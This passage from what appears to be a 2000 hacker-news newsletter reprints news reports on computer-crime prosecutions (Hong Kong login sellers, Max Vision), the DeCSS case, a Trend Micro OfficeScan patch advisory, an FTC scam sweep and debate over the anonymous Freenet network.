Candy that they faced deterrent sentences. The three
plead guilty to a total of 49 charges including the
downloading and selling of music files. Sentencing has
been scheduled for April 5th.

South China Morning Post
http://www.technologypost.com/features/Daily/20000322105804432.asp?Section

FEATURES

Teen hackers face
deterrent sentences

ELAINE PAK LI

Three teenage computer hackers were warned
yesterday that they faced deterrent sentences after they
admitted selling login names and passwords stolen from
the Internet in the first case of its kind in Hong Kong.

One of the trio, a student, was also convicted of
downloading songs from the Internet and selling them
for profit.

At Eastern Court, restaurant manager Tam Hei-lun and
clerk Po Yiu-ming, both 19, and student Mak
King-lam, 18, pleaded guilty to a total of 49 charges.

Magistrate Ian Candy remanded them in custody for
sentencing on April 5, pending reports, and said: "It is
precisely these kind of computer crimes which leave
Internet users in fear and make them pause before
conducting even the most basic of transactions.

"These criminal activities should be nipped in the bud
and a deterrent sentence must be imposed."

All the offences took place between March 1998 and
May last year.

David Leung, prosecuting, told the court Po had hacked
into other Internet users' computers and unlawfully
obtained 127 login names and passwords given to
Internet users when they subscribe to an Internet service
provider for a monthly fee and an hourly rate.

The three defendants knew each other through the
Internet and Po had sold some of his illegally obtained
login names and passwords to Tam for $3,000, but
gave others for free to Mak. Tam later resold them for
$1,500.

The three were aware that the information they obtained
was acquired illegally, the magistrate was told.

Mr Leung said the three defendants had hacked into the
accounts of Internet users of Hongkong Telecom IMS
Netvigator, Vision Network Ltd, City Telecom (HK),
Netfront Information Technology and ABC Net, saving
themselves the monthly fees and causing losses to the
account holders.

Tam admitted 14 counts of obtaining access to a
computer with a view to dishonest gain, Po admitted 12
and Mak two.

Mak also admitted 10 charges of selling pirated discs, in
which he downloaded songs from the Internet and sold
200 discs from his own Web site. Each disc contained
100 songs and was priced at $88.

Tam, who asked buyers of the logins to deposit money
into his bank account, also admitted eight counts of
dealing with property known or reasonably believed to
represent proceeds of an indictable offence.

Po admitted a further three charges of criminally
damaging the computers of three users.


@HWA


67.0 HNN:Mar 24th:2600 Retains Big name Attorneys - Trial Date Set
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Macki
Martin Garbus, an internationally distinguished New York
attorney, and his firm (Frankfurt, Garbus, Klein, and
Selz) have been retained by the defense in the New
York MPAA DeCSS case. Two of the three defendants
have withdrawn under consent agreements, leaving only
2600 Magazine and its publisher Emmanuel Goldstein, as
defendant. A trail date has been set for December 5,
2000.

2600 Electronic Frontier Foundation - They are providing
funding, please show your support!

http://www.2600.com/news/2000/0324.html

http://www.eff.org

TRIAL DATE SET IN DECSS CASE - WORLD RENOWNED
LEGAL TEAM TAKES CASE

03/24/00

The importance of the fight against the MPAA and
the DVD Copy Control Association was underlined
this week with the hiring of the legal team of
Frankfurt, Garbus, Klein, and Selz to represent
2600.

Martin Garbus, who will be the key lawyer on our
side, has defended the likes of Lenny Bruce,
Spike Lee, Samuel Beckett, Andrei Sakharov, and
Vaclav Havel and is the author of "Tough Talk,"
published in 1998. He is a renowned First
Amendment attorney and, thanks to funding from
the Electronic Frontier Foundation, we have him
in our court. Please show your support to the
EFF for taking on this important case and help
them to play a key role in whatever cases come
up in the future.

We've already seen a significant development
this week as we have been granted the time we
need to build our defense. The court was
prepared to start the trial on May 1st which is
what the plaintiffs wanted. After presenting our
arguments, we were given a court date of
December 5th. This is a very good development
for us as there is much to be prepared. An
uninformed court would have been bad for all of
us.

As the weeks and months progress, we will be in
need of expert witnesses and testimony
supporting our position. Your help and support
will be invaluable as always. We will keep you
updated as events progress.


@HWA


68.0 HNN:Mar 24th:Max Vision Indicted in San Jose
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/


contributed by McIntyre
A suspect involving computer break-ins at NASA and the
U.S. departments of energy, defense and transportation
was indicted in San Jose on Wednesday. the indictment
of Max Vision (Max Ray Butler) of Berkeley included
charges of unauthorized access of a computer,
recklessly causing damage and interception of electronic
communication for a total of 15 counts. Max Vision was
previously an FBI informant who turned himself in on
Tuesday.

Associated Press - via Yahoo
http://dailynews.yahoo.com/h/ap/20000323/us/hacker_indicted_1.html

Wednesday March 22 11:56 PM ET

Suspected Gov't Hacker Indicted

SAN FRANCISCO (AP) - A suspected computer hacker made his first court
appearance Wednesday after being indicted on charges of breaking into
computers belonging to NASA and the U.S. departments of energy, defense
and transportation, said federal prosecutors.

Max Ray Butler, 27, of Berkeley was ordered held on $100,000 bail during
the hearing in San Jose. On March 15, he was indicted on 15 criminal
counts, including unauthorized access of a computer, recklessly causing
damage and interception of electronic communication.

All the counts carry sentences of at least six months and fines of
hundreds of thousands of dollars.

Butler, who also goes by the name of Max Vision, had been an FBI source,
helping agents solve computer crimes, authorities said. He turned himself
in on Tuesday.

Butler's attorney did not return a telephone call seeking comment.

-=-

More:

(SfGate)
http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/2000/03/24/MN57003.DTL


FBI Computer Expert Accused of Hacking

Henry K. Lee, Chronicle Staff Writer

Friday, March 24, 2000



Max Ray Butler seemed to be at the top of his game. For two years, the
computer expert was a confidential source for an elite FBI computer crime
squad, helping to ferret out scofflaws on the Internet.

Butler, also known as Max Vision, was also a self-described ``ethical
hacker'' from the Silicon Valley who boasted that he could test the
security of any computer system by penetrating it.

But Butler's cyber activity went too far, federal authorities say.

Butler, 27, of Berkeley appeared in federal court in San Jose yesterday on
a 15-count federal indictment charging him with hacking into computers
used by the University of California at Berkeley, national laboratories,
federal departments, air force bases across the country and a NASA flight
center.

Butler posted $50,000 cash bail yesterday after U.S. Magistrate Judge
Patricia Turnbull ordered him not to use computers except for work. Butler
and his attorney, Jennifer Granick of San Francisco, could not be reached
for comment.

The indictment, handed down March 15, said Butler caused ``reckless
damage'' as a result of intrusions in May 1998. Butler was also charged
with possession, with intent to defraud, of 477 passwords belonging to
customers of a Santa Clara- based Internet service provider.

The case underscores the potential risks involved when law-enforcement
agencies use confidential informants with access to sensitive information.

``Sources are often very close to criminal activity, and sometimes they
cross the line,'' said Special Agent George Grotz, an FBI spokesman in San
Francisco.

Grotz declined to say how Butler became an FBI informant and whether he
was a federal source at the time of the alleged crimes. Grotz said Butler
is no longer associated with the agency.

Friends of the suspect told the Associated Press that Butler was caught
possibly violating the law several years ago and began working with the
FBI to avoid charges. Seth Alves, 27, told the news agency that Butler was
unfairly targeted after refusing to comply with an FBI request.

A 22-month investigation by the FBI and military investigators ended
Tuesday morning when federal agents converged on a home on Dwight Way near
the UC Berkeley campus, where Butler lives with his his 23-year-old wife,
Kimi Winters. No one answered the door. Butler turned himself in to the
FBI in Oakland later that day.

Butler grew up in Idaho and lived with his family in Washington, where
authorities said he has a 1997 misdemeanor conviction for attempted
trafficking of stolen property.

He developed a proficiency with computers, eventually attracting the
attention of the FBI's Computer Crime Squad, which used him as a
confidential informant.

An FBI search warrant affidavit said Butler was ``well known'' to squad
members and ``has provided useful and timely information on computer
crimes in the past.''

In 1997, Butler started a company known as Max Vision in Mountain View,
specializing in ``penetration testing'' and ``ethical hacking'' procedures
in which he would simulate for clients how a hacker would penetrate their
computer systems, according to the company Web site.

``Our client penetration rate is currently 100 percent,'' the site said,
with recent clients including a large consortium of telecommunications
companies, a major motion picture company and an e-commerce online auction
service.

By 1998, Butler was living with Winters in a one-story San Jose apartment,
where the couple started up their own Web-design company, Kimi Networks,
records show. Reached by telephone yesterday, Winters hung up on a
Chronicle reporter.

It was also from that apartment, according to the FBI, that Butler hacked
into computers by using a computer software vulnerability known as a
buffer overflow, which sends commands into a system that ordinarily would
not be allowed.

Butler also allegedly invaded computers used by the Lawrence Berkeley
National Laboratory. Vern Paxson, a computer scientist at the lab, noticed
an online intruder conducting unauthorized scans of laboratory and UC
Berkeley computers in May 1998 and used a monitoring device that later
helped identify the source of the intrusions.

Paxson said yesterday that Butler's arrest was ``somewhat ironic'' but
``not totally surprising.''

Paxson said a person later identified as Butler even sent him an
apologetic e-mail a day after the computer intrusions. Butler also somehow
obtained
a confidential incident report Paxton had filed about
the invasions, Paxson said.

@HWA


68.1 KYZSPAM: More on Max Vision.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Source: Dragos (email)

Further info from Dragos Ruii and the Kyxspam world domination conspiracy

url: http://www.mediacentral.com/channels/allnews/03_23_2000.reutr-story-N23354790.html

Ex-FBI source charged with hacking

SAN JOSE, Calif., March 23 (Reuters) - A man officials say was once a
confidential FBI source on computer hackers has been charged with
allegedly breaking into computer systems belonging to NASA, the military
and the U.S. departments of energy, defense and transportation, the U.S.
Attorney's office said.

Max Ray Butler, 27, also known as Max Vision, was due to appear in court
on Thursday to face charges of breaking into and damaging computers as
well as possessing the passwords of customers of California Internet
service provider Aimnet.

The indictment's 15 counts carry fines ranging from $5,000 up to $250,000
and jail terms totaling more than 50 years in prison, said officials at
the U.S. Attorney's office in San Francisco.

A Federal Bureau of Investigation affidavit filed to support a search of
his home showed Butler, of Berkeley, Calif., was a confidential source for
FBI agents tracking computer crimes before authorities began their
22-month investigation of him in May 1998.

Butler, being held in lieu of $100,000 bond, surrendered on Tuesday to
authorities in Oakland. He was scheduled to attend a bail review hearing
on Thursday in U.S. District Court in San Jose.

The arrest comes amid growing concern over a number of recent high-profile
computer hacker attacks.

But authorities said there is no connection between Butler and the
"denial-of-service" attacks in early February that temporarily cut off
customers to some of the Web's biggest sites, including Yahoo!, eBay ,
Amazon.com and E-Trade.

"There are no allegations related to denial-of-service attacks but we
would characterize this as a serious case," said U.S. attorney Ross
Nadler, chief of the office's newly created Computer Hacking and
Intellectual Property unit.

Lawyers for Butler could not be reached for comment.

The FBI, the U.S. Air Force, NASA and the U.S. Navy began an investigation
after several U.S. Air Force computer systems around the country were
attacked in May 1998, although it was unclear when Butler became their
focus.

Butler is accused of hacking into computers belonging to the U.S.
Department of Energy's Argonne National Laboratories in Illinois and the
Brookhaven National Laboratory in New York; NASA's Marshall Flight Center
in Alabama; the office of the Secretary of Transportation in Washington,
D.C.; the office of the Secretary of the Department of Defense in
Washington, D.C.; and unspecified facilities of the Department of Defense,
and IDSoftware of Mesquite, Texas.



© 2000 Reuters Limited. All rights reserved.


-=-




From: Dragos Ruiu <dr@dursec.com>
To: <*>
Sent: Thursday, March 23, 2000 2:51 PM


(Hmmm.... thanks Ken for the head's up. I am also in agreement:
I don't know any of the details of the incident, but I do know that Max
has been a valuable resource and has contributed enormous amounts
of effort and knowledge to the entire computer security field.
I hope that alone is of some mitigating consideration... --dr)


Berkeley man indicted, charged with hacking government computers

Copyright © 2000 Nando Media
Copyright © 2000 Associated Press


From Time to Time: Nando's in-depth look at the 20th century

SAN FRANCISCO (March 23, 2000 8:20 a.m. EST http://www.nandotimes.com) -
A suspected computer hacker appeared in court for the first time Wednesday
after being indicted on charges of breaking into computers belonging to
NASA and the U.S. departments of energy, defense and transportation,
federal prosecutors said.

Max Ray Butler, 27, of Berkeley was ordered held on $100,000 bail during
the hearing in San Jose. On March 15, he was indicted on 15 criminal counts,
including unauthorized access of a computer, recklessly causing damage and
interception of electronic communication.

All the counts carry sentences of at least six months and fines of
hundreds of thousands of dollars.

Butler, who also goes by the name of Max Vision, had been an FBI source,
helping agents solve computer crimes, authorities said. He turned himself
in Tuesday.

Butler's attorney did not return a telephone call seeking comment.

--
dursec.com / kyx.net - we're from the future http://www.dursec.com
learn kanga-foo from security experts: CanSecWest - May 10-12 Vancouver

Speakers: Ken Williams/E&Y, Marty Roesch/Hiverworld, Fyodor/insecure.org,
RainForestPuppy/wiretrip.net, Theo de Raadt/OpenBSD,
Max Vision/whitehats.com


-=-

From: Dragos

(I guess one of the interviews on radio ran this morning.
This showed up on a local (MyBC) news page too,
funny... I don't remember giving that quote to them.
But out of all the negative light they could have
shone I'm happy with the way it was handled. --dr)

url: http://www2.mybc.com/bc/news/fs.cfm?id=172752

Friday , Mar 24, 2000

Guest speaker busted

VANCOUVER (CKNW/AM980) -- An expert on Internet security who was scheduled
to speak at a Vancouver conference has been arrested by the FBI.

Max Butler is charged with hacking into computers and destroying information.
One of the organizers of the local conference, Dragos Ruiu of Dursec-dot-com,
says that Butler was very well known among those in the information technology
sector.

"He ran an intrusion database, kind of like a big listing of signatures that
people use towatch for hackers intruding into their network, and it was quite
a famous data base," said Ruiu. "Lots of Fortune 500 companies and big sites
use his database as a way of protecting their networks."

Ruiu is now scrambling to find a replacement for Butler. The conference
runs May 10-12.

-=-



@HWA


69.0 HNN:Mar 24th:Koreans Attempt to Learn Security Secrets
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/


contributed by Apocalyse Dow
The Korean Advanced Institute of Science and
Technology (KAIST) will conduct a 'hacking contest'.
the contest is set to start in June and will offer 100
Million Won in prize money for defeating a firewall. (If
they really expect to get anything out this other than
publicity they are sadly mistaken.)

Chosun
http://www.chosun.com/w21data/html/news/200003/200003220527.html


KAIST to Hold Hackers Contest

An international hacking contest will be held under the auspices of the
Korean Advanced Institute of Science and Technology (KAIST) it was
announced Wednesday. The Information Protection Education Research
Center of the institute which formally opened the same day said that it will
inject W300 million to host the First World Information Protection Contest
(WIPC) in June.

The contest will have hackers attempt to break into a firewall the center has
built. A total of W100 million prize money is prepared for the event, which
aims to find out the international standard of hackers and to test the capacity
of Korean information protection technology.

(Sim Jae-yool, jysim@chosun.com)


@HWA


70.0 HNN:Mar 24th:Rack Mount Your iMac
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/


Found on Slashdot
This has been posted elsewhere it is just to cool not to
link to. Who would have ever thought of hacking an
iMac into a rack-mount? Definitely a cool hardware
hack.

The iMac Rack-Mount Project
http://imac.pointinspace.com/

(Surf to the URL homeboyie! pics and plans available
for this kewl hack, someone found a use for the iMac??
- Ed)


@HWA


71.0 HNS:Mar 24th:SECRETS STOLEN
~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS (Help Net Security) http://www.net-security.org/


by BHZ Friday 24 March 2000 on 5:57 PM
British police said today they were hunting a thief who had stolen a
secret service computer containing confidential information on
Northern Ireland.
Link: Yahoo!

http://dailynews.yahoo.com/h/nm/20000324/tc/britain_spies_1.html

Friday March 24 10:18 AM ET

British Intelligence Laptop Stolen at Station

LONDON (Reuters) - British police said Friday they were hunting a thief
who had stolen a secret service computer containing confidential
information on Northern Ireland.

The laptop computer was snatched while an employee of Britain's domestic
security service, MI5, was buying a ticket at London's Paddington train
station.

``I can confirm that a laptop computer was stolen from the security
service employee on March 4 at Paddington Underground (station),'' said a
government official who declined to be identified.

``The information contained in the laptop was well protected and we
believe it to be secure. We are not prepared to discuss the nature of the
material.''

The information on the computer was understood to be heavily encrypted and
was related to the situation in Northern Ireland, but not to refer to the
state of the peace process or any guerrilla threat.

A spokesman for Prime Minister Tony Blair said
officials were always concerned at the loss of any
sensitive material, but they were confident it was
secure and that national security had not been
threatened.

``We believe this is an opportunistic theft and
not a deliberate attempt to gain access to
security service information,'' he said.

Asked why agents were walking around with security
information on computers, the spokesman said there
were strict procedures for moving classified
material. ``You can certainly say they've been
tightened since this incident,''
he added.

The Sun newspaper said a squad of 150 police were working around the clock
to catch the thief. Before the start of the 1991 Gulf War in Kuwait and
Iraq, a laptop said to have contained war plans was stolen from the car of
a Royal Air Force officer, who lost his job as a result.

The latest theft comes as the peace process in Northern Ireland is in
disarray.

Last month Britain decided to suspend a fledgling home-rule government
over lack of progress on disarmament by Irish Republican Army guerrillas.

@HWA

72.0 HNS:Mar 24th:PATCH RELEASED BY TREND MICRO
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS (Help Net Security) http://www.net-security.org/

by BHZ Friday 24 March 2000 on 5:43 PM
Trend Micro has released a patch that eliminates server security
vulnerabilities found on OfficeScan Corporate Edition 3.51 or earlier
versions, running on Windows NT 4 server with Internet Information
Server(IIS).
Link: Bugware
http://www.net-security.org/cgi-bin/bugs/fullnews.cgi?newsid953916142,40085,

Patch available for OfficeScan vulnerability
Posted to BugTraq on March 24, 2000

Security Focus BugTraq ID: 1057

Posted: March 22, 2000

Summary
=======
Trend Micro has released a patch that eliminates server security
vulnerabilities found on OfficeScan Corporate Edition 3.51 or earlier
versions, running on Windows NT 4 server with Internet Information
Server (IIS). These versions of OfficeScan allow intruders within a
firewall to invoke OfficeScan CGIs on the server without
authentication - bypassing OfficeScan management console
password protection. These OfficeScan CGIs are intended for
administrator to manage OfficeScan antivirus running on networked
workstations via the OfficeScan management console. By gaining
access to execute these CGIs, hackers can use them to change
OfficeScan antivirus configurations or to uninstall OfficeScan
antivirus on thedesktops.

Issues
======
Trend OfficeScan version 3.51 or earlier versions apply inadequate
security settings on the OfficeScan server CGI components. If a
malicious user, has the ability to connect to the OfficeScan server
via a web browser, these CGIs can be executed to send valid
commands - including uninstall command - to OfficeScan clients. In
addition, OfficeScan's implementation of user authentication in its
management console - password protection - was insufficiently
encrypted, and allows a malicious user to decrypt and gain access
to the OfficeScan management console.

Implementation
==============
Trend Micro has released a patch that will secure access to the
OfficeScan CGIs on the server. The patch program changes the file
permissions on the OfficeScan CGIs, so only administrators can
access and execute them. This patch works only on drives
formatted to use Windows NT file system (NTFS). After applying this
patch, hackers will no longer be able to remotely invoke OfficeScan
CGIs without being authenticated as a administrator by NTFS
security. This patch also prevents hackers, who sniffs for OfficeScan
management console password over the network, from gaining
access to the OfficeScan management console. Access to the
OfficeScan management console or to execute OfficeScan CGIs
now requires NTFS authentication.

Affected Software Versions
==========================
Trend OfficeScan Corporate Edition 3.0
Trend OfficeScan Corporate Edition 3.11
Trend OfficeScan Corporate Edition 3.13
Trend OfficeScan Corporate Edition 3.50
Trend OfficeScan Corporate Edition 3.51
Trend OfficeScan for Microsoft SBS 4.5

This vulnerability is only present when the above software version is
installed on a Windows NT server with IIS. It is not present when the
above software version is installed on Novell NetWare servers or
Windows NT server without IIS.

Patch Availability
==================
OfficeScan Unauthenticated CGI Usage patch can be downloaded
from:

http://www.antivirus.com/download/ofce_patch.htm

More Information
================
Please see the following references for more information related to
this issue.
- Trend Micro Security Bulletin:
http://www.antivirus.com/download/ofce_patch_351.htm
- Frequently Asked Questions: Trend Micro Knowledge Base
http://solutionbank.antivirus.com/solutions/faqResult.asp?product=8

Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Trend
MicroTechnical Support is available at
http://www.trend.com/support/default.htm

Acknowledgements
================
Trend Micro thanks Gregory Duchemin
http://www.securite-internet.com and Elias Levy
http://www.securityfocus.com for reporting the OfficeScan server
vulnerability to us, and working with us to protect our customers.

@HWA

73.0 HNS:Mar 24th:PRIVACY ISSUES
~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Friday 24 March 2000 on 5:32 PM
The idea that privacy and security might be symptoms and not the
problem emerged from a recent Webmaster focus group discussion
with the Office of Personnel Management on defining Webmaster
classifications.
Link: FCW
http://www.fcw.com/fcw/articles/2000/0320/web-dotgov-03-23-00.asp

COMMENT

Privacy, security on the Web require business
know-how

FCW's Dot-gov Thursday column

BY Rich Kellet
03/23/2000

The idea that privacy and security might be symptoms and not the problem emerged
from a recent Webmaster focus group discussion with the Office of Personnel
Management on defining Webmaster classifications.

We worked through the usual issues of defining technology Webmasters and content
Webmasters. As we moved from the discussion of specialists to the issue of World
Wide Web managers, an interesting perspective emerged from our discussions.
Anecdotes and informal surveys are showing that about half of the Webmaster
community works in mission-oriented program offices, which are not information
technology organizations.

This led to a discussion of the difference between managers in program
organizations and managers in technology organizations. Web managers in program
organizations tend to be business managers and Web managers in IT organizations
tend to be technology managers. The conclusion of this discussion was to define a
"breed" of Web manager under an IT series that is a technology manager or "Web
technology manager"

So, what about the concept of a classification for a Web business manager? I asked
the group if anyone knew of a classification for business managers in the federal
government. To my surprise, there does not appear to be one.

It is important to pause at this point and consider what this means. Individuals who
obtain business degrees, undergraduate or higher, have qualifications in an area
recognized by the private sector as a unique skill and a profession in its own right.
These skills are essential to running large programs that deliver the government’s
products and services to the public or other agencies.

When I developed the top skill areas that a federal Web manager needs so that the
Webmaster can deliver programs online, to my own surprise, most of the required
skills originated from business skills, such as accounting and financial management
and budgeting.

As I looked across government, I found surprisingly little information on what it
means to run a business in the federal government context. There is plenty of
information on, for instance, project management, but managing a project is not
running a business. There is plenty of information on policy, but carrying out policy
is not a running business. There is plenty on management, but management skills are
not the only skills required to run a business.

Courses in small business or college programs in business administration provide
samples of the curriculums that define the skills needed to run a business. Running a
business over the Web in government is about understanding, integrating and
applying principles and processes related to leadership, culture, business processes
and components, management, policy, and technology into a functioning
organization that delivers a set of products and services to the public or other
agencies.

The issues of privacy and security are difficult to incorporate into Web sites
because they challenge our abilities as business managers. Privacy and security are
not "modules" you can buy off the shelf. It is not solely a technology issue, a people
issue or a system issue. Privacy and security are "embedded and threaded"
throughout the business processes, the organization’s working knowledge and the
supporting technology infrastructure.

At each level of the architecture and in the operations of the business, people and
assets (routers, servers, operating systems and other components) Web masters
must incorporate privacy and security concepts and solutions. To solve privacy and
security requires a commitment to re-inventing business processes, developing the
organization’s business and technology skills, and improving the underlying
infrastructure.

This is the stuff of a Web business manager. This is far beyond just "plugging holes"
in operating systems or applications. Solving privacy and security is an
enterprisewide issue that requires Web business leaders working with other business
leaders in the agency.

With the Web becoming the central construct for delivering products and services,
the government is going to need Web business managers. We have many now, and
we need to continue to grow this portion of the work force.

So, where does that leave us? Not surprisingly, it is a business decision to decide
whether to solve these issues by funding them appropriately, to develop business
processes that incorporate privacy and security, and to build and continuously
improve our organizational knowledge for putting in place privacy and security
solutions. We can spend a lot of time on chasing privacy or security holes or solve
the problem more efficiently and in less time by looking at the whole business.

-- Kellet is founder of the Federal Web Business Council, co-chair of the Federal
Webmaster Forum, and is director of GSA’s Emerging IT Policies Division.



@HWA

74.0 HNS:Mar 24th:TARGETING ONLINE SCAMMERS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Friday 24 March 2000 on 11:34 AM
Law enforcement officials from 27 countries and 45 states have
conducted a massive sweep of the Internet searching for
"get-rich-quick" schemes and scams, the Federal Trade
Commission said Thursday.
Link: ZDNet

http://mcafee.snap.com/main/page/pcp/cd/0,85,-1715-1085412-303380,00.html


Authorities target online
scammers
By Margaret Kane, ZDNet News
03/23/2000 10:22


Law enforcement officials from 27 countries and
45 states have conducted a massive sweep of
the Internet searching for "get-rich-quick"
schemes and scams, the Federal Trade
Commission said Thursday.

More than 1,600 sites were uncovered in the
"Get-Rich-Quick.con" program, one of several
"surfs" the agency conducted looking for problems
and crimes on the Net.

The latest sweep hooked up law enforcement
officials across state and national borders and
involved hundreds of researchers who scoured the
Net for scam artists.

Many languages, one voice "We want them to know
that the borderless Internet marketplace is not a free
zone for fraud," said Jodie Bernstein, director of the
FTC Bureau of Consumer Protection. "Though we
speak different languages on the subject of Internet
fraud, we speak with one voice. Our message is:
Con artists will not threaten the safety of the Net."

'We're going to run them out of town, and run them
off the Web'|Drew Edmondson, Oklahoma attorney
general Some of the schemes promised users
rewards such as "surf the Net and earn $100 an
hour," he said. Authorities also found a variety of
pyramid schemes, outrageous product claims and
outright fraud.

The sites are sent e-mail warnings, and
documentation of the sites is provided to law
enforcement agencies in the various jurisdictions,
which will be able to further investigate and press
charges, if necessary.

Bernstein said the agencies could begin filing
charges in June or July.

Calling out the cyberposse "As an old prosecutor I'm
looking forward to Phase Two. Once we've
investigated, as the old sheriff would do, we're going
to run them out of town and run them off the Web,"
said Drew Edmondson, Oklahoma attorney general.
"And where appropriate we'll put them in jail."

It came as no surprise to speakers at Thursday's
news conference that con artists have migrated
onto the Web. About half of the U.S. Postal
Service's mail fraud investigations begin as online
solicitations, said Lawrence Maxwell, USPS
inspector in charge of fraud, prohibited mailings and
forfeiture investigations.

It's easy for con artists to target consumers "in an
age dominated by a 'Who Wants to be a Millionaire'
mentality," said Richard Walker, enforcement
director for the Securities and Exchange
Commission.



@HWA

75.0 HNS:Mar 24th:FEARS OF FREENET
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Friday 24 March 2000 on 11:30 AM
A report by a British scientific magazine suggests that an
anonymous Internet system designed to guarantee free speech
online could be used by child pornographers, terrorists and others
with less-than-pristine purposes.
Link: Computer Currents

http://www.currents.net/newstoday/00/03/24/news5.html



Daily News
Freenet Raises Security
Fears
By Martin Stone, Newsbytes
March 24, 2000

A report by a British scientific magazine suggests that an
anonymous Internet system designed to guarantee free speech
online could be used by child pornographers, terrorists and
others with less-than-pristine purposes.

A Reuters report today said a New Scientist magazine article
on the Freenet program, which was created by Edinburgh
University graduate Ian Clarke and others to make tracing file
originators impossible, thereby giving dissidents in countries
without free speech a voice, could be misused by those with
sinister designs.

The report stated that the Internet Watch Foundation, an
independent body monitoring Web sites in Britain, fears the
decentralized system could make policing the Net and tracking
down computer crimes even more difficult.

"There is clear potential for misuse by criminals, terrorists and
pedophiles," Roger Darlington, chairman of the foundation, told
the weekly magazine in its latest issue, Reuters reported.

Users of Freenet are difficult to track down because files do not
contain a unique Web address and are distributed on
computers belonging to Freenet members. To retrieve a file,
users enter the key, Reuters said.

According to Clarke, a single computer user cannot be held
responsible for Freenet files because the originator cannot be
traced.

"It's perfect machine anarchy," he is quoted as saying. "No
single computer is in control."

Reported by Newsbytes.com

@HWA


75.1 Anonymous net access aiding and abetting online criminals?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From: Dragos Ruii

url: http://www.wired.com/news/technology/0,1282,34768,00.html

Alternative Net Protects Pirates
by Leander Kahney

3:00 a.m. 8.Mar.2000 PST
Open-source advocates are developing an alternative publishing network
that promises to provide true anonymity in sharing documents and files
over the Internet.

But in addition to protecting free speech, the new system also could be a
boon for multimedia pirates.

Freenet is an open-source file-transfer system similar to the Web for
sharing digital content such as HTML pages and MP3 music files. It will be
run by connected clusters of servers or node stations that could in turn
be run on almost any PC connected to the Internet.

But unlike the Web, Freenet has no centralized administrative
infrastructure of domain name servers (DNS) and IP addresses that can be
used to track users. Hosting and replicating documents and files requires
that Freenet backers volunteer their time and resources.

Because Freenet aims to be anonymous, secure, and without centralized
control, it would make it almost impossible to trace people who post
content -- legal or otherwise -- onto the network.

"My primary motivation was to make it very difficult to censor
information," said Ian Clarke, an Irish programmer who designed the
system. "With the Internet there's the potential to censor and monitor
people to a degree that's never been possible before. I wanted to develop
the technology to make this impossible."

Clarke started work on Freenet 18 months ago as a graduate student in
artificial intelligence at Edinburgh University.

He had been outraged by the Australian government's proposal to introduce
sweeping censorship laws, which went into effect in January.

Clarke hopes to launch the first public version in the spring, but he said
the system is still pretty rough. The server is nearly finished, but so
far there are no browsers, or clients, to make the network easy to use.

Freenet software will be released under the GNU public license, which will
allow anyone to freely distribute and change the source code. The system
is being written in Java by about a dozen programmers internationally.
They have never met nor even spoken over the phone -- all communication is
by email, Clarke said.

Both authors and readers can choose to be anonymous if they so wish,
Clarke said. Like the Web, the network is navigated by a client, or
browser.

He said it will even be difficult to determine if someone is running a
Freenet server and what information is being stored on it, Clarke said.

Alex Fowler of the Electronic Frontier Foundation said that while he
generally supports anti-censorship tools, Freenet could create as many
problems as it solves.

Fowler said that Freenet could be a useful tool in countries like
Singapore or China that censor the Net or quash free speech. But he
doesn't like the idea that you wouldn't be able to remove sensitive
information -- such as someone's medical records.

"There's no way to tell if a project like this will actually take off," he
said. "It's certainly going to raise some questions with a whole lot of
people. Not just copyright holders, but governments too."

Patrick Ball, deputy director of the Science and Human Rights Program with
the American Association for the Advancement for Science, said too

  
ls like
anonymizers, strong cryptography, and Freenet tend not to help activists
who are not already under surveillance because using them is in itself
suspicious and tends to alert the authorities.

"I'm for any application that protects dissidents," he said. "But there's
a higher order problem that's very difficult to get around, and that's by
using these tools you draw attention to yourself."

Although Clarke designed Freenet to protect free speech, he thinks that
the safeguards they are building in to make it difficult to track down
those who distribute content could lead to its notoriety as a vehicle for
copyright piracy.

The system was designed to make it impossible to find out where files are
physically stored. Information posted to the network is stored on multiple
servers simultaneously, making it difficult to remove a file.

In fact, Clarke said any attempt to remove information causes it to be
copied to other servers on the network.

The only way to remove information is to disable the entire network, which
may prove difficult if it becomes popular and is running on thousands of
PCs all over the globe.

However, Clarke said the network cannot be guaranteed to permanently store
information. Only popular files survive for any period of time. Older,
unpopular files would be overwritten by more popular ones.

"As a project we don't want to be labeled as hackers who distribute warez
or copyrighted material," he said. "The purpose of Freenet is to promote
freedom of information, but there is an inevitable consequence there that
it might lead to violation of copyright law."

"The potential for protecting freedom of speech is more important than
protecting copyright, which is an economic tool," Clarke added.

Clark noted that Freenet can be functionally identical to Napster, the
wildly popular network for sharing music online. But while the Recording
Industry Association of America is currently seeking a court order to shut
down Napster's central servers, it would be almost impossible to disable a
Freenet network running on machines all over the world.

"Because it's decentralized no one can be held responsible for it," Clarke
said. "Once it's released there's no point coming after me because there's
nothing I, nor anyone else, can do to shut it down."

Eric Sheirer, a music technology researcher at MIT's Media Lab, said
Freenet is an interesting experiment, but said it would likely be used
only by a small community of pirates and "privacy nuts."

"If it is adopted, it will be adopted by people who want to exchange
illegal information and by people who are rabid about privacy and
security, which is a relatively small universe," Sheirer said.

Sheirer pointed out that the Web is trustworthy because of the content on
certain domains, and he likes the convenience of tracking devices such as
cookies that remember log-in names and passwords.

"Many of the advantages of Freenet are disadvantages to me," he said.

Nonetheless, Sheirer said the advent of Freenet and Gnapster, an
open-source clone of Napster, illustrated the need for debate about
copyright laws in the age of ubiquitous digital distribution channels.

"There are larger questions about the implications of these technologies,"
Sheirer said.

@HWA


